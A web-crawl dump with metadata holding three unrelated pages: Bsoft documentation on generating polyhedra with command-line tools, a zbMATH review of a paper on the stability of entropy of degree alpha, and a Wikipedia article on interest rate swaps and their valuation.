2.57805e+13 49197.2" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.60354114,"math_prob":0.9906575,"size":4541,"snap":"2021-43-2021-49","text_gpt3_token_len":1615,"char_repetition_ratio":0.11924179,"word_repetition_ratio":0.028148148,"special_character_ratio":0.4523233,"punctuation_ratio":0.07483871,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9986542,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-21T16:49:09Z\",\"WARC-Record-ID\":\"<urn:uuid:97653853-9124-43eb-bb11-b0407118382e>\",\"Content-Length\":\"39924\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8c1d0756-ac58-443e-934b-ea3532423143>\",\"WARC-Concurrent-To\":\"<urn:uuid:eba612e5-70fa-47a1-b8b0-f2efbbc1c980>\",\"WARC-IP-Address\":\"46.105.53.190\",\"WARC-Target-URI\":\"https://metanumbers.com/60254\",\"WARC-Payload-Digest\":\"sha1:F33JH3ZFZ22VWONVAUQR2AUELUOQXM4I\",\"WARC-Block-Digest\":\"sha1:3T7OQFWKR27NE2FWPXTDEGJ3IWKIAZ3L\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585439.59_warc_CC-MAIN-20211021164535-20211021194535-00224.warc.gz\"}"}
https://lsbr.niams.nih.gov/bsoft/model/bsoft_poly.html
[ "## Polyhedra\n\nA polyhedral model is composed of components (usually called vertices) and links (also called edges), but also has polygons formed by rings of links, and usually has specific rules for vertex or polygon valency. The following list defines specific types of polyhedra and polyhedral concepts:\n\n• A polyhedron typically has a fixed vertex valency, or a fixed polygon order.\n• The dual of a polyhedron switches the locations of vertices with polygons, such that a polyhedron with fixed valency becomes a polygon with fixed polygon order.\n• A deltagraph is a polyhedron with triangular polygons.\n• A fullerene is a polyhedron with trivalent vertices, 12 pentagons and a variable number of hexagons.\n• A polygon is considered closed when it either has the same valency for all vertices, or the same order for all polygons.\n\nThe easiest way to visualize polyhedra is using UCSF Chimera and converting the model to the Chimera marker model format (cmm):\n\nThe options for specifying the component and link radii may be necessary to produce reasonable display sizes for these elements.\n\n## Generating polyhedra\n\nBsoft offers various ways to generate polyhedra (e.g., Heymann et al., 2008).\n\n### Cylindrical algorithm\n\nA cylindrical polygon can be a tube that is open at the ends, or closed with a specific cap type. The pentagonal type adds a semi-icosahedral cap to each end, while the hexagonal type adds a six-fold cap at each end. First, a deltagraph is generated as a cylinder with flat ends:\n\nIt is then converted to its dual to give a fullerene:\n\nbpoly -verb 1 -dual -out loz_dual.cmm loz.cmm\n\nThis is still distorted and has to be regularized:\n\nbpoly -verb 1 -reg 10000 -linklen 1 -Klink 0.1 -Kpolyangle 0.01 -Kpolyplane 0.0001 -out loz_reg.cmm loz_dual.cmm\n\nThe pentagons can then be highlighted by color:\n\nbmodcol -verb 1 -polygons 5 -color 0,0,1,0 -out loz_reg_col.cmm loz_reg.cmm", null, "### Spiral algorithm\n\nAlmost any closed polyhedron can be built from a linear sequence of polygons, assembled in a manner where succesive polygons form a spiral on the polyhedral surface. This linear sequence of polygons can be encoded as a simple sequence of numbers relating the polygon orders. In the case the fullerenes, there are always 12 pentagons and a variable number of hexagons. The spiral algorithm simply generates all permutations of a specified length sequence of 5's and 6's, attempts to generate a closed polyhedron from each sequence, and keeping those closed polyhedra as output models. A comprehensive enumeration of fullerenes with a specific number of vertices can be generated:\n\nbspiral -verb 1 -vert 36 36.star\n\nThis gives 15 closed polyhedra out of a possible 125970 permutations of the 20-polygon sequence.\n\n(Note: A fullerene with n vertices always has 12 pentagons and (n-20)/2 hexagons)" ]
[ null, "https://lsbr.niams.nih.gov/bsoft/model/loz_reg_cols.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8521347,"math_prob":0.9722502,"size":2923,"snap":"2020-34-2020-40","text_gpt3_token_len":753,"char_repetition_ratio":0.13532032,"word_repetition_ratio":0.017021276,"special_character_ratio":0.22511119,"punctuation_ratio":0.10971223,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9743796,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-28T09:56:48Z\",\"WARC-Record-ID\":\"<urn:uuid:fbdaef55-22b0-4386-b408-7268eabad193>\",\"Content-Length\":\"4427\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1899ec99-a58c-433e-85a7-a2fd538b277a>\",\"WARC-Concurrent-To\":\"<urn:uuid:1ff1ddbe-7db9-46b9-ad03-a7d9c109a2f2>\",\"WARC-IP-Address\":\"137.187.246.165\",\"WARC-Target-URI\":\"https://lsbr.niams.nih.gov/bsoft/model/bsoft_poly.html\",\"WARC-Payload-Digest\":\"sha1:2TAZDH3PCFUYUDMQ7QZ5S27KLMZYZFSG\",\"WARC-Block-Digest\":\"sha1:IRAIAWCS3R2XV4OV3K6F2WASMGPR6XEM\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600401598891.71_warc_CC-MAIN-20200928073028-20200928103028-00358.warc.gz\"}"}
https://www.zbmath.org/?q=an%3A1149.39024
[ "# zbMATH — the first resource for mathematics\n\nThe stability of the entropy of degree alpha. (English) Zbl 1149.39024\nThe functional equation $g(x)+(1-x)^{\\alpha}g\\left(\\frac{y}{1-x}\\right)=g(y)+(1-y)^{\\alpha}g \\left(\\frac{x}{1-y}\\right)\\tag{1}$ with unknown mapping $$g:[0,1]\\to\\mathbb R$$ and with $$\\alpha=1$$ is known as a fundamental equation of information. For $$0<\\alpha\\neq 1$$ it has been considered by Z. Daróczy [Inf. Control 16, 36–51 (1970; Zbl 0205.46901)]. In the present paper, the author proves the Hyers-Ulam stability of the equation (1) (for $$\\alpha\\neq 1$$) and generalizes the result of Daróczy. Then, the stability of (1) is applied in the proof of the stability of some system of functional equations characterizing the entropy of degree alpha (Havrda-Charvát or Tsallis entropy). Some open problems are posed, in particular the one concerning the stability of equation (1) for $$\\alpha=1$$.\n\n##### MSC:\n 39B82 Stability, separation, extension, and related topics for functional equations 94A17 Measures of information, entropy 39B72 Systems of functional equations and inequalities\nFull Text:\n##### References:\n Aczél, J.; Daróczy, Z., On measures of information and their characterizations, (1975), Academic Press New York, San Francisco · Zbl 0345.94022 Daróczy, Z., Generalized information functions, Inform. and control, 16, 36-51, (1970) · Zbl 0205.46901 Ebanks, B.; Sahoo, P.; Sander, W., Characterizations of information measures, (1998), Word Scientific Publishing Co. Inc. River Edge, NJ Forti, G.L., Hyers – ulam stability of functional equations in several variables, Aequationes math., 50, 1-2, 143-190, (1995) · Zbl 0836.39007 R. Ger, A survey of recent results on stability of functional equations, in: Proceedings of the 4th International Conference on Functional Equations and Inequalities, Pedagogical University in Cracow, 1994, pp. 5-36 Havrda, J.; Charvát, F., Quantification method of classification processes. concept of structural α-entropy, Kybernetika, 3, 30-35, (1967) · Zbl 0178.22401 Hyers, D.H., On the stability of the linear functional equations, Proc. nat. acad. sci. USA, 27, 222-224, (1941) · Zbl 0061.26403 Maksa, Gy., Solution on the open triangle of the generalized fundamental equation of information with four unknown functions, Util. math., 21, 267-282, (1982) · Zbl 0497.94003 Maksa, Gy.; Ng, C.T., The fundamental equation of information on open domain, Publ. math. debrecen, 33, 1-2, 9-11, (1986) · Zbl 0618.94004 Morando, A., A stability result concerning Shannon entropy, Aequationes math., 62, 286-296, (2001) · Zbl 0991.39021 Moszner, Z., Sur LES définitions différentes de la stabilitédes équation fonctionelles, Aequationes math., 68, 260-274, (2004) Shannon, C.E., A mathematical theory of communication, Bell system tech. J., 27, 379-423, (1948), and 623-656 · Zbl 1154.94303 Székelyhidi, L., 38. problem, Aequationes math., 41, 302, (1991) Tsallis, C., Possible generalization of boltzmann – gibbs statistics, J. stat phys., 52, 1-2, 479-487, (1988) · Zbl 1082.82501 Ulam, S.M.; Ulam, S.M., Problems in modern mathematics, (1964), Wiley New York · Zbl 0137.24201\nThis reference list is based on information provided by the publisher or from digital mathematics libraries. Its items are heuristically matched to zbMATH identifiers and may contain data conversion errors. It attempts to reflect the references listed in the original paper as accurately as possible without claiming the completeness or perfect precision of the matching." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7002906,"math_prob":0.97812515,"size":3867,"snap":"2021-21-2021-25","text_gpt3_token_len":1187,"char_repetition_ratio":0.15169558,"word_repetition_ratio":0.010889292,"special_character_ratio":0.34471166,"punctuation_ratio":0.25841346,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9884371,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-14T12:03:36Z\",\"WARC-Record-ID\":\"<urn:uuid:68ba81ca-001d-4385-9d50-df15fd8007b1>\",\"Content-Length\":\"52513\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:73c6c4cb-4232-4c26-9ad0-9499a864ea18>\",\"WARC-Concurrent-To\":\"<urn:uuid:69cd0521-1968-475e-b385-8f6901e87f15>\",\"WARC-IP-Address\":\"141.66.194.3\",\"WARC-Target-URI\":\"https://www.zbmath.org/?q=an%3A1149.39024\",\"WARC-Payload-Digest\":\"sha1:KTPDNSNFCVB7DP6XJ2YLIVR4YLB7JQOM\",\"WARC-Block-Digest\":\"sha1:MS2LLVQETFE6IYZAR2IJQLV6TKVBJNKU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623487612154.24_warc_CC-MAIN-20210614105241-20210614135241-00416.warc.gz\"}"}
http://wikien3.appspot.com/wiki/Interest_rate_swap
[ "# Interest rate swap\n\nIn finance, an interest rate swap (IRS) is an interest rate derivative (IRD). It involves exchange of interest rates between two parties. In particular it is a linear IRD and one of the most liquid, benchmark products. It has associations with forward rate agreements (FRAs), and with zero coupon swaps (ZCSs).\n\n## Interest rate swaps\n\n### General description", null, "Graphical depiction of IRS cashflows between two counterparties based on a notional amount of EUR100mm for a single (i'th) period exchange, where the floating index $r_{i}$", null, "will typically be an -IBOR index.\n\nAn interest rate swap's (IRS's) effective description is a derivative contract, agreed between two counterparties, which specifies the nature of an exchange of payments benchmarked against an interest rate index. The most common IRS is a fixed for floating swap, whereby one party will make payments to the other based on an initially agreed fixed rate of interest, to receive back payments based on a floating interest rate index. Each of these series of payments is termed a \"leg\", so a typical IRS has both a fixed and a floating leg. The floating index is commonly an interbank offered rate (IBOR) of specific tenor in the appropriate currency of the IRS, for example LIBOR in USD, GBP, EURIBOR in EUR, or STIBOR in SEK.\n\nTo completely determine any IRS a number of parameters must be specified for each leg: \n\nEach currency has its own standard market conventions regarding the frequency of payments, the day count conventions and the end-of-month rule.\n\n### Extended description\n\n There are several types of IRS, typically: \"Vanilla\" fixed for floating Basis swap Cross currency basis swaps Amortising swap Zero coupon swap Constant maturity swap Overnight indexed swap\n\nAs OTC instruments, interest rate swaps (IRSs) can be customised in a number of ways and can be structured to meet the specific needs of the counterparties. For example: payment dates could be irregular, the notional of the swap could be amortized over time, reset dates (or fixing dates) of the floating rate could be irregular, mandatory break clauses may be inserted into the contract, etc. A common form of customisation is often present in new issue swaps where the fixed leg cashflows are designed to replicate those cashflows received as the coupons on a purchased bond. The interbank market, however, only has a few standardised types.\n\nThere is no consensus on the scope of naming convention for different types of IRS. Even a wide description of IRS contracts only includes those whose legs are denominated in the same currency. It is generally accepted that swaps of similar nature whose legs are denominated in different currencies are called cross currency basis swaps. Swaps which are determined on a floating rate index in one currency but whose payments are denominated in another currency are called Quantos.\n\nIn traditional interest rate derivative terminology an IRS is a fixed leg versus floating leg derivative contract referencing an IBOR as the floating leg. If the floating leg is redefined to be an overnight index, such as EONIA, SONIA, FFOIS, etc. then this type of swap is generally referred to as an overnight indexed swap (OIS). Some financial literature may classify OISs as a subset of IRSs and other literature may recognise a distinct separation.\n\nFixed leg versus fixed leg swaps are rare, and generally constitute a form of specialised loan agreement.\n\nFloat leg versus float leg swaps are much more common. These are typically termed (single currency) basis swaps (SBSs). The legs on SBSs will necessarily be different interest indexes, such as 1M, LIBOR, 3M LIBOR, 6M LIBOR, SONIA, etc. The pricing of these swaps requires a spread often quoted in basis points to be added to one of the floating legs in order to satisfy value equivalence.\n\n### Uses\n\nInterest rate swaps are used to hedge against or speculate on changes in interest rates.\n\nInterest rate swaps are also used speculatively by hedge funds or other investors who expect a change in interest rates or the relationships between them. Traditionally, fixed income investors who expected rates to fall would purchase cash bonds, whose value increased as rates fell. Today, investors with a similar view could enter a floating-for-fixed interest rate swap; as rates fall, investors would pay a lower floating rate in exchange for the same fixed rate.\n\nInterest rate swaps are also popular for the arbitrage opportunities they provide. Varying levels of creditworthiness means that there is often a positive quality spread differential that allows both parties to benefit from an interest rate swap.\n\nThe interest rate swap market in USD is closely linked to the Eurodollar futures market which trades among others at the Chicago Mercantile Exchange.\n\n## Valuation and pricing\n\nIRSs are bespoke financial products whose customisation can include changes to payment dates, notional changes (such as those in amortised IRSs), accrual period adjustment and calculation convention changes (such as a day count convention of 30/360E to ACT/360 or ACT/365).\n\nA vanilla IRS is the term used for standardised IRSs. Typically these will have none of the above customisations, and instead exhibit constant notional throughout, implied payment and accrual dates and benchmark calculation conventions by currency. A vanilla IRS is also characterised by one leg being 'fixed' and the second leg 'floating' referencing an -IBOR index. The net present value (PV) of a vanilla IRS can be computed by determining the PV of each fixed leg and floating leg separately and summing. For pricing a mid-market IRS the underlying principle is that the two legs must have the same value initially; see further under Rational pricing.\n\nCalculating the fixed leg requires discounting all of the known cashflows by an appropriate discount factor:\n\n$P_{\\text{fixed}}=NR\\sum _{i=1}^{n_{1}}d_{i}v_{i}$", null, "where $N$", null, "is the notional, $R$", null, "is the fixed rate, $n_{1}$", null, "is the number of payments, $d_{i}$", null, "is the decimalised day count fraction of the accrual in the i'th period, and $v_{i}$", null, "is the discount factor associated with the payment date of the i'th period.\n\nCalculating the floating leg is a similar process replacing the fixed rate with forecast index rates:\n\n$P_{\\text{float}}=N\\sum _{j=1}^{n_{2}}r_{j}d_{j}v_{j}$", null, "where $n_{2}$", null, "is the number of payments of the floating leg and $r_{j}$", null, "are the forecast -IBOR index rates of the appropriate currency.\n\nThe PV of the IRS from the perspective of receiving the fixed leg is then:\n\n$P_{\\text{IRS}}=P_{\\text{fixed}}-P_{\\text{float}}$", null, "Historically IRSs were valued using discount factors derived from the same curve used to forecast the -IBOR rates. This has been called 'self-discounted'. Some early literature described some incoherence introduced by that approach and multiple banks were using different techniques to reduce them. It became more apparent with the 2007–2012 global financial crisis that the approach was not appropriate, and alignment towards discount factors associated with physical collateral of the IRSs was needed.\n\nPost crisis, to accommodate credit risk, the now-standard pricing framework is the multi-curves framework where forecast -IBOR rates and discount factors exhibit disparity. Note that the economic pricing principle is unchanged: leg values are still identical at initiation. See Financial economics § Derivative pricing for further context. Here, Overnight Index Swap (OIS) rates are typically used to derive discount factors, since that index is the standard inclusion on Credit Support Annexes (CSAs) to determine the rate of interest payable on collateral for IRS contracts. As regards the rates forecast, since the basis spread between LIBOR rates of different maturities widened during the crisis, forecast curves are generally constructed for each LIBOR tenor used in floating rate derivative legs.\n\nRegarding the curve build, see . Under the old framework a single self discounted curve was \"bootstrapped\", i.e. solved such that it exactly returned the observed prices of selected instruments, with the build proceeding sequentially, date-wise, through these instruments. Under the new framework, the various curves are best fitted to observed market prices — as a \"curve set\" — one curve for discounting, one for each IBOR-tenor \"forecast curve\". Here, since the observed average overnight rate is swapped for the -IBOR rate over the same period (the most liquid tenor in that market), and the -IBOR swaps are in turn discounted on the OIS curve, the problem entails a nonlinear system, where all curve points are solved at once, and specialized iterative methods are usually employed — very often a modification of Newton's method. Other tenor's curves can be solved in a \"second stage\", bootstrap-style.\n\nUnder both frameworks, the following apply. (i) Maturities for which rates are solved directly are referred to as \"pillar points\", these correspond to the input instrument maturities; other rates are interpolated. (ii) The objective function: prices must be \"exactly\" returned, as described. (iii) The penalty function will weigh: that forward rates are positive (to be arbitrage free) and curve \"smoothness\"; both, in turn, a function of the interpolation method. (iv) The initial estimate: often, the most recently solved curve set. ((v) All that need be stored are the pillar-values and the interpolation rule.)\n\nA CSA could allow for collateral, and hence interest payments on that collateral, in any currency. To address this banks include in their curve-set, a USD discount-curve sometimes called the \"basis-curve\", to be used for discounting local-IBOR trades with USD collateral. This curve is built by solving for observed (mark-to-market) cross-currency swap rates, where the local -IBOR is swapped for USD LIBOR with USD collateral as underpin; a pre-solved (external) USD LIBOR curve is therefore an input into the curve build (the basis-curve may be solved in the \"third stage\"). Each currency's curve-set will then include a local-currency discount-curve and its USD discounting basis-curve. As required, a third-currency discount curve — i.e. for local trades collateralized in a currency other than local or USD (or any other combination) — can then be constructed from the two basis-curves, i.e. of the local-currency and third-currency, as combined via an arbitrage relationship known as \"FX Forward Invariance\".\n\nThe complexities of modern curvesets mean that there may not be discount factors available for a specific -IBOR index curve. These curves are known as 'forecast only' curves and only contain the information of a forecast -IBOR index rate for any future date. Some designs constructed with a discount based methodology mean forecast -IBOR index rates are implied by the discount factors inherent to that curve:\n\n$r_{j}={\\frac {1}{d_{j}}}\\left({\\frac {x_{j-1}}{x_{j}}}-1\\right)$", null, "where $x_{i-1}$", null, "and $x_{i}$", null, "are the start and end discount factors associated with the relevant forward curve of a particular -IBOR index in a given currency.\n\nTo price the mid-market or par rate, $S$", null, "of an IRS (defined by the value of fixed rate $R$", null, "that gives a net PV of zero), the above formula is re-arranged to:\n\n$S={\\frac {\\sum _{j=1}^{n_{2}}r_{j}d_{j}v_{j}}{\\sum _{i=1}^{n_{1}}d_{i}v_{i}}}$", null, "In the event old methodologies are applied the discount factors $v_{k}$", null, "can be replaced with the self discounted values $x_{k}$", null, "and the above reduces to:\n\n$S={\\frac {x_{0}-x_{n_{2}}}{\\sum _{i=1}^{n_{1}}d_{i}x_{i}}}$", null, "In both cases, the PV of a general swap can be expressed exactly with the following intuitive formula:\n\n$P_{\\text{IRS}}=N(R-S)A$", null, "where $A$", null, "is the so-called Annuity factor $A=\\sum _{i=1}^{n_{1}}d_{i}v_{i}$", null, "(or $A=\\sum _{i=1}^{n_{1}}d_{i}x_{i}$", null, "for self-discounting). This shows that the PV of an IRS is roughly linear in the swap par rate (though small non-linearities arise from the co-dependency of the swap rate with the discount factors in the Annuity sum).\n\nDuring the life of the swap the same valuation technique is used, but since, over time, both the discounting factors and the forward rates change, the PV of the swap will deviate from its initial value. Therefore, the swap will be an asset to one party and a liability to the other. The way these changes in value are reported is the subject of IAS 39 for jurisdictions following IFRS, and FAS 133 for U.S. GAAP. Swaps are marked to market by debt security traders to visualize their inventory at a certain time. As regards P&L Attribution, and hedging, the new framework adds complexity in that the trader's position is now potentially affected by numerous instruments not obviously related to the trade in question.\n\n## Risks\n\nInterest rate swaps expose users to many different types of financial risk. Predominantly they expose the user to market risks and specifically interest rate risk. The value of an interest rate swap will change as market interest rates rise and fall. In market terminology this is often referred to as delta risk. Interest rate swaps also exhibit gamma risk whereby their delta risk increases or decreases as market interest rates fluctuate. (See Greeks (finance), Value at risk #Computation methods, Value at risk #VaR risk management. )\n\nOther specific types of market risk that interest rate swaps have exposure to are basis risks - where various IBOR tenor indexes can deviate from one another - and reset risks - where the publication of specific tenor IBOR indexes are subject to daily fluctuation.\n\nUncollateralised interest rate swaps - those executed bilaterally without a CSA in place - expose the trading counterparties to funding risks and credit risks. Funding risks because the value of the swap might deviate to become so negative that it is unaffordable and cannot be funded. Credit risks because the respective counterparty, for whom the value of the swap is positive, will be concerned about the opposing counterparty defaulting on its obligations. Collateralised interest rate swaps, on the other hand, expose the users to collateral risks: here, depending upon the terms of the CSA, the type of posted collateral that is permitted might become more or less expensive due to other extraneous market movements.\n\nCredit and funding risks still exist for collateralised trades but to a much lesser extent. Regardless, due to regulations set out in the Basel III Regulatory Frameworks, trading interest rate derivatives commands a capital usage. The consequence of this is that, dependent upon their specific nature, interest rate swaps might command more capital usage, and this can deviate with market movements. Thus capital risks are another concern for users.\n\nGiven these concerns, banks will typically calculate a credit valuation adjustment, as well as other x-valuation adjustments, which then incorporate these risks into the instrument value.\n\nReputation risks also exist. The mis-selling of swaps, over-exposure of municipalities to derivative contracts, and IBOR manipulation are examples of high-profile cases where trading interest rate swaps has led to a loss of reputation and fines by regulators.\n\nHedging interest rate swaps can be complicated and relies on numerical processes of well designed risk models to suggest reliable benchmark trades that mitigate all market risks; although, see the discussion above re hedging in a multi-curve environment. The other, aforementioned risks must be hedged using other systematic processes.\n\n## Quotation and Market-Making\n\n### ISDA Benchmark Swap Rates\n\nISDA, ICAP, and Reuters select a number of swap dealers based on their reputation, credit standing and scale of activity in each major currency. Those dealers are asked to provide swap rates for the designated maturities of a given currency within a polling window. Reuters will calculate the benchmark swap rate based on a simple average of the submitted rates after eliminating the highest and lowest ones and publish them.\n\n### Market-Making\n\nThe market-making of IRSs is an involved process involving multiple tasks; curve construction with reference to interbank markets, individual derivative contract pricing, risk management of credit, cash and capital. The cross disciplines required include quantitative analysis and mathematical expertise, disciplined and organized approach towards profits and losses, and coherent psychological and subjective assessment of financial market information and price-taker analysis. The time sensitive nature of markets also creates a pressurized environment. Many tools and techniques have been designed to improve efficiency of market-making in a drive to efficiency and consistency.\n\n## Trivia\n\nOn its December 2014 statistics release, the Bank for International Settlements reported that interest rate swaps were the largest component of the global OTC derivative market representing 60% of it, with the notional amount outstanding in OTC interest rate swaps of $381 trillion, and the gross market value of$14 trillion.\n\nInterest rate swaps can be traded as an index through the FTSE MTIRS Index.\n\n## Controversy\n\nIn June 1988 the Audit Commission was tipped off by someone working on the swaps desk of Goldman Sachs that the London Borough of Hammersmith and Fulham had a massive exposure to interest rate swaps. When the commission contacted the council, the chief executive told them not to worry as \"everybody knows that interest rates are going to fall\"; the treasurer thought the interest rate swaps were a \"nice little earner\". The Commission's Controller, Howard Davies, realised that the council had put all of its positions on interest rates going down and ordered an investigation.\n\nBy January 1989 the Commission obtained legal opinions from two Queen's Counsel. Although they did not agree, the commission preferred the opinion that it was ultra vires for councils to engage in interest rate swaps (ie. that they had no lawful power to do so). Moreover, interest rates had increased from 8% to 15%. The auditor and the commission then went to court and had the contracts declared void (appeals all the way up to the House of Lords failed in Hazell v Hammersmith and Fulham LBC); the five banks involved lost millions of pounds. Many other local authorities had been engaging in interest rate swaps in the 1980s. This resulted in several cases in which the banks generally lost their claims for compound interest on debts to councils, finalised in Westdeutsche Landesbank Girozentrale v Islington London Borough Council. Banks did, however, recover some funds where the derivatives were \"in the money\" for the Councils (ie, an asset showing a profit for the council, which it now had to return to the bank, not a debt)\n\nGeneral:\n\n• Leif B.G. Andersen, Vladimir V. Piterbarg (2010). Interest Rate Modeling in Three Volumes (1st ed. 2010 ed.). Atlantic Financial Press. ISBN 978-0-9844221-0-4. Archived from the original on 2011-02-08.\n• J H M Darbyshire (2017). Pricing and Trading Interest Rate Derivatives (2nd ed. 2017 ed.). Aitch and Dee Ltd. ISBN 978-0995455528.\n• Richard Flavell (2010). Swaps and other derivatives (2nd ed.) Wiley. ISBN 047072191X\n• Miron P. & Swannell P. (1991). Pricing and Hedging Swaps, Euromoney books\n\nEarly literature on the incoherence of the one curve pricing approach:\n\n• Boenkost W. and Schmidt W. (2004). Cross currency swap valuation, Working Paper 2, HfB - Business School of Finance & Management SSRN preprint.\n• Henrard M. (2007). The Irony in the Derivatives Discounting, Wilmott Magazine, pp. 92–98, July 2007. SSRN preprint.\n• Tuckman B. and Porfirio P. (2003). Interest rate parity, money market basis swaps and cross-currency basis swaps, Fixed income liquid markets research, Lehman Brothers\n\nMulti-curves framework:\n\n• Bianchetti M. (2010). Two Curves, One Price: Pricing & Hedging Interest Rate Derivatives Decoupling Forwarding and Discounting Yield Curves, Risk Magazine, August 2010. SSRN preprint.\n• Henrard M. (2010). The Irony in the Derivatives Discounting Part II: The Crisis, Wilmott Journal, Vol. 2, pp. 301–316, 2010. SSRN preprint.\n• Kijima M., Tanaka K., and Wong T. (2009). A multi-quality model of interest rates, Quantitative Finance, pages 133-145, 2009." ]
[ null, "http://upload.wikimedia.org/wikipedia/commons/9/96/IRSflows.png", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/a0b6d651eaf432dbf1f106021c8bb499ae83fd1f", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/97f2c16f949e76dc9ce34692f812f0a030ae2e27", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/f5e3890c981ae85503089652feb48b191b57aae3", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/4b0bfb3769bf24d80e15374dc37b0441e2616e33", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/ee784b70e772f55ede5e6e0bdc929994bff63413", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/abe3154db7d4f92fb42dd1f80f52f528c6312e4a", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/7dffe5726650f6daac54829972a94f38eb8ec127", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/bb3ee6926801fe0a68aca9a9aad0799ca03a9c67", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/840e456e3058bc0be28e5cf653b170cdbfcc3be4", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/a7d3b724fc249d56f0d550b92f6891380467e350", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/4ea68faa91fea0bd7762febb88e75d3a2fc08dba", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/e222bdf83f43415106c164c5216cdd7867dae115", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/db345bb67bd140474742faf5d2fff314daa04e33", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/e87000dd6142b81d041896a30fe58f0c3acb2158", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/4611d85173cd3b508e67077d4a1252c9c05abca2", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/4b0bfb3769bf24d80e15374dc37b0441e2616e33", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/0d943de012834efce945990ab63ebca4959bf18e", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/d142b4083872eb72f81c1e20fd2c91d02b4a9838", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/6d2b88c64c76a03611549fb9b4cf4ed060b56002", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/3def78f6d1d3107ae04b4712d15b5ce88d5c0662", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/72ee149f9f09885fab1fe6555c859a92b918f991", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/7daff47fa58cdfd29dc333def748ff5fa4c923e3", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/28a748c9d5df850e0ec41a87d9e6a212b26bc1a8", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/43471ac6ba66c0a19d41e13ac31164fcfa66a31d", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.92143303,"math_prob":0.89620143,"size":21954,"snap":"2019-51-2020-05","text_gpt3_token_len":4727,"char_repetition_ratio":0.14086561,"word_repetition_ratio":0.0043516103,"special_character_ratio":0.20820807,"punctuation_ratio":0.105344296,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9691183,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50],"im_url_duplicate_count":[null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-14T06:30:37Z\",\"WARC-Record-ID\":\"<urn:uuid:5cac9dd7-6f37-4915-a980-8d4a1a2e0e61>\",\"Content-Length\":\"120976\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5156a9ad-47c6-4326-bf64-e3d072550b8f>\",\"WARC-Concurrent-To\":\"<urn:uuid:0b3fddac-74f3-4f7c-996b-c1c445297b47>\",\"WARC-IP-Address\":\"172.217.13.84\",\"WARC-Target-URI\":\"http://wikien3.appspot.com/wiki/Interest_rate_swap\",\"WARC-Payload-Digest\":\"sha1:W2XVBEG2QRIG4ANICP5J6T5XFFN45UU6\",\"WARC-Block-Digest\":\"sha1:DDVNA7RLH2MGDTTCPBZ6MI4MTRSXG34U\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540584491.89_warc_CC-MAIN-20191214042241-20191214070241-00158.warc.gz\"}"}
http://www.agr.unizg.hr/hr/ects-en/bs_courses_taught_in_english/4/0/business_statistics_i/35
